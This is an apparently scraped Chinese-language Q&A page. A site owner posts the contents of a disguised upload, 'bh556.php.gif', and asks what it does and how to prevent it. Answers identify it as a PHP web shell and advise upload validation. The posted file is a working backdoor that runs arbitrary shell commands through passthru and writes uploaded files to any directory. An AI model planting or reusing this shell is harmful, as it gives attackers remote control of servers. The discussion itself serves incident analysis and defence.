【问题标题】:Possible website hack attempt可能的网站黑客尝试
【发布时间】:2015-03-08 08:34:56
【问题描述】:

我刚刚收到来自我的主人的温暖信息,告诉我.. "我们检测到有人恶意尝试通过 http 或 ftp 访问您的帐户"

检查恶意文件后,有人上传了一个名为“bh556.php.gif”的图标

打开这个文件,它包含以下代码:

<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>

<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "FILE UPLOADED TO $dez";
}
?>     </pre>
<form name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
      </td>
    </tr>
</table>
</body>
</html>

有人可以解释一下如何防止再次通过图标上传,还请解释一下上面的代码到底在做什么?

【问题讨论】:

  • "Whats the code doing?" 试图创建一个可用于上传其他文件并在您的服务器上运行任意 php 代码的后门。 "how to prevent this" 验证您上传脚本中的图像,以检查它们是否真的是图像:stackoverflow.com/questions/7393419/…

标签: php validation


【解决方案1】:

这是一个 PHP Webshel​​l,请参阅 here 以获取常用列表。它允许恶意用户通过 PHP 文件执行命令,这是极大的危害。

通过标题和一些巧妙的技巧将它们隐藏在图像中很常见,请参阅解释here

我的建议,删除文件,解决泄漏的原因,这可能是某种描述的注入攻击。

【讨论】:

  • 我敢打赌他使用网站的文件上传功能上传伪装成.gif的shell,希望上传脚本将删除.gif扩展名并使其成为.php。然后他将能够通过他的文件控制网站。但是,我认为这个 shell 行不通,我在 shellcode 中发现了一些编程错误。例如,
    标签没有关闭。
猜你喜欢
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
相关资源
最近更新 更多